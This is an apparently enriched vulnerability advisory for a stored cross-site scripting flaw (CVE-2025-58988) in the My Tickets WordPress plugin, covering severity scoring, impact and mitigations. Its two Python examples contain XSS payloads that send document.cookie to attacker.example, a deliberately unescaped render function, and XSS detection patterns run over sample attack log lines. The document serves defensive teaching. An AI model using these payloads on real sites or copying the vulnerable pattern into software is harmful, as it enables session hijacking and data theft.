
CVE-2025-58988: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Joe Dolson My Tickets

Medium
Tags: Vulnerability, CVE-2025-58988, cve, cwe-79
Published: Tue Sep 09 2025 (09/09/2025, 16:33:10 UTC)
Source: CVE Database V5
Vendor/Project: Joe Dolson
Product: My Tickets

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joe Dolson My Tickets allows Stored XSS. This issue affects My Tickets: from n/a through 2.0.22.

AI-Powered Analysis

Last updated: 09/09/2025, 16:45:21 UTC

Technical Analysis

CVE-2025-58988 is a stored cross-site scripting (XSS) vulnerability in My Tickets, the WordPress event ticketing plugin by Joe Dolson, affecting all versions through 2.0.22. It is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation): user-supplied input is persisted by the plugin and later rendered into a page without adequate output encoding, so a script embedded in that input executes in the browser of every user who views the affected page. The advisory does not name the affected field or page.

The CVSS 3.1 base score is 6.5 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L. The payload is submitted over the network with low attack complexity; the attacker needs an authenticated account with low privileges to store it, and a victim must interact, in practice by loading the page that renders the stored content. Scope is Changed because the vulnerable component is the web application while the impacted component is the victim's browser, which is the standard scoring for XSS. Confidentiality, integrity and availability impacts are each rated Low: the attacker's script runs in the victim's origin and session, so it can read anything the page can read, alter page content, and issue requests as the victim. Where the session cookie is HttpOnly, which WordPress sets by default for its authentication cookies, the script cannot read the cookie directly but can still perform authenticated actions from the victim's browser.

No exploitation in the wild had been reported and no patch had been linked at the time this record was enriched. The CVE was published in September 2025 and assigned by Patchstack. My Tickets is used to sell tickets and manage registrations for events, so the users who view stored ticket data are typically site administrators, event staff and customers.
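The rendering defect described above, as an added example that is not code from the My Tickets plugin (which is written in PHP) or from the advisory: a Python model of the same CWE-79 pattern, with the vulnerable rendering, a naive tag-stripping "fix", and a context-aware output-encoded version, each checked with the standard-library HTML parser to show which tags and event-handler attributes a browser would actually see. The two payloads, the field names holder_name and email, and the attacker.example host are constructed for illustration; the advisory does not name the affected field.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed payloads standing in for an attacker-controlled ticket field.
# Hypothetical: the advisory does not name the affected field or parameter.
TEXT_CONTEXT_PAYLOAD = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)
# No '<' at all: breaks out of a double-quoted attribute instead of opening a tag.
ATTR_CONTEXT_PAYLOAD = (
    '" autofocus onfocus="fetch(\'https://attacker.example/?c=\'+document.cookie)" x="'
)


def render_vulnerable(holder_name: str, email: str) -> str:
    """CWE-79 pattern: stored values interpolated into HTML with no encoding."""
    return (
        f"<tr><td>{holder_name}</td>"
        f'<td><input name="email" value="{email}"></td></tr>'
    )


def render_stripped(holder_name: str, email: str) -> str:
    """Naive fix that only strips <...> tags; misses attribute-context payloads."""

    def strip_tags(value: str) -> str:
        return re.sub(r"<[^>]*>", "", value)

    return render_vulnerable(strip_tags(holder_name), strip_tags(email))


def render_hardened(holder_name: str, email: str) -> str:
    """Output encoding for each context. escape(quote=True) rewrites & < > " and '
    so neither a text node nor a quoted attribute can be broken out of."""
    return (
        f"<tr><td>{escape(holder_name, quote=True)}</td>"
        f'<td><input name="email" value="{escape(email, quote=True)}"></td></tr>'
    )


class TagCollector(HTMLParser):
    """Records the start tags and on* event-handler attributes a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(fragment: str) -> tuple[list[str], list[str]]:
    """Return (tags not in the template, event-handler attributes) in the fragment."""
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    unexpected = sorted(set(parser.tags) - {"tr", "td", "input"})
    return unexpected, sorted(set(parser.handlers))


if __name__ == "__main__":
    variants = [
        ("vulnerable", render_vulnerable),
        ("strip tags", render_stripped),
        ("hardened", render_hardened),
    ]
    for label, render in variants:
        result = active_content(render(TEXT_CONTEXT_PAYLOAD, ATTR_CONTEXT_PAYLOAD))
        print(f"{label:>11}: unexpected tags={result[0]} handlers={result[1]}")
```

The tag-stripping variant is there to make the practical point: a filter that only removes angle-bracket tags leaves the attribute-context payload intact, which is why encoding for the output context, not input filtering, is the fix for CWE-79. In WordPress PHP the equivalents are esc_html() for text nodes and esc_attr() for attribute values, with wp_kses_post() where a limited HTML subset must be allowed.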

Potential Impact

For organizations running My Tickets, including the European deployments this feed tracks, the main risks are abuse of a victim's authenticated session, unauthorized actions such as ticket purchases, changes or cancellations made in the victim's name, and leakage of data visible on the affected pages. The most valuable victims are administrators and staff who review ticket or order data, because a script executing in their session inherits their permissions. The attacker needs an account with low privileges, so sites that allow open registration or let customers create accounts to buy tickets expose the attack surface to anyone who signs up. The user-interaction requirement is satisfied by a victim simply viewing the page that renders the stored content, so no phishing is strictly necessary, although a crafted link can steer a specific victim to that page. Scope Changed reflects that the damage lands in the victim's browser rather than in the plugin itself. Confidentiality and integrity impacts are rated Low but are not negligible; availability impact is Low and would require a script that deliberately breaks the page. Organizations handling personal data or payments through the platform face the greatest exposure, and disclosure or manipulation of customer data resulting from exploitation could trigger GDPR breach-notification and liability obligations.

Mitigation Recommendations

1. Update My Tickets to a fixed release as soon as Joe Dolson publishes one; until then, assess whether the plugin can be deactivated on sites where the exposure is unacceptable.
2. The affected code is third-party plugin code, so site operators cannot normally patch it themselves. Where you maintain a fork, custom templates or integrations that output ticket data, apply context-appropriate output encoding to every user-supplied value (in WordPress: esc_html() for text, esc_attr() for attribute values, wp_kses_post() where limited HTML is required) rather than relying on input filtering.
3. Deploy a Content Security Policy that disallows unsafe-inline scripts, using nonces or hashes for legitimate inline code. Many WordPress themes and plugins depend on inline scripts, so roll it out with Content-Security-Policy-Report-Only first and enforce only after the reports are clean.
4. Review any custom code that handles ticket or attendee input for missing or context-mismatched escaping.
5. Limit who can obtain the low-privileged account the attack requires: disable open registration if it is not needed, and remind administrators and staff that viewing stored ticket data with an elevated session is itself the exposure, so suspicious links into the ticketing system deserve caution.
6. Monitor web application and access logs for XSS-shaped input in ticketing parameters, decoding percent-encoded and double-encoded values before matching.
7. Put a Web Application Firewall in front of the site with XSS rules applied to both query strings and request bodies, since stored payloads are usually submitted via POST.
8. Segregate the ticketing site from other critical infrastructure and use separate credentials for it, so a compromised administrator session does not extend further.
9. Regularly audit and test the application for XSS and other injection flaws with automated scanners and manual penetration testing.
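Mitigation items 6 and 7 above (log monitoring and WAF rules) in working form, as an added example that is not the site's, Patchstack's or the plugin's own code: a Python scanner over constructed combined-format access-log lines that decodes each query parameter, including double-encoded values, and reports which XSS rule a suspicious value matches. The log lines, the /tickets/ path, the holder parameter and the client addresses are constructed for illustration; the advisory does not publish the affected endpoint or field.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in combined format. Paths, parameter names and
# addresses are hypothetical; the advisory does not publish the affected endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Sep/2025:16:40:01 +0000] "GET /tickets/?event=concert&page=2 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Sep/2025:16:40:07 +0000] "GET /tickets/?holder=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 913 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Sep/2025:16:40:09 +0000] "GET /tickets/?holder=%2522%2520autofocus%2520onfocus%253Dalert(1)%2520x%253D%2522 HTTP/1.1" 200 913 "-" "Mozilla/5.0"
198.51.100.2 - - [09/Sep/2025:16:41:00 +0000] "GET /tickets/?holder=O%27Brien%20%26%20Sons HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) \S+"
)

# Ordered so the most specific rule is reported first.
XSS_RULES = [
    ("script_tag", re.compile(r"<\s*script\b", re.I)),
    ("html_tag", re.compile(r"<\s*[a-z!/]", re.I)),
    # A finite handler list keeps ordinary parameter names such as 'online' from matching.
    ("event_handler", re.compile(
        r"\bon(error|load|focus|blur|click|mouse\w+|key\w+|toggle|animation\w+)\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
]


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode and entity-decode until stable, bounded, to defeat double encoding."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list[str]:
    """Names of the XSS rules matched by one already-decoded parameter value."""
    return [name for name, pattern in XSS_RULES if pattern.search(value)]


def scan_log(text: str) -> list[dict]:
    """Flag query parameters carrying XSS-shaped input; one finding per parameter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # parse_qsl percent-decodes once; normalize() strips any further layers.
        for key, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            value = normalize(raw)
            rules = classify(value)
            if rules:
                findings.append({
                    "line": lineno,
                    "client": m["client"],
                    "param": key,
                    "rules": rules,
                    "value": value,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Stored XSS payloads are usually submitted in POST bodies, which standard access logs do not record; treat the query-string scan as the cheap first pass and run the same classify() over request bodies wherever the WAF or the application logs them. The same rule set, expressed in the WAF's own syntax, is the starting point for item 7.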


Technical Details

Data Version: 5.1
Assigner Short Name: Patchstack
Date Reserved: 2025-09-06T04:45:22.563Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68c05927ffcb452a184a8c47

Added to database: 9/9/2025, 4:43:19 PM

Last enriched: 9/9/2025, 4:45:21 PM

Last updated: 9/9/2025, 9:34:38 PM
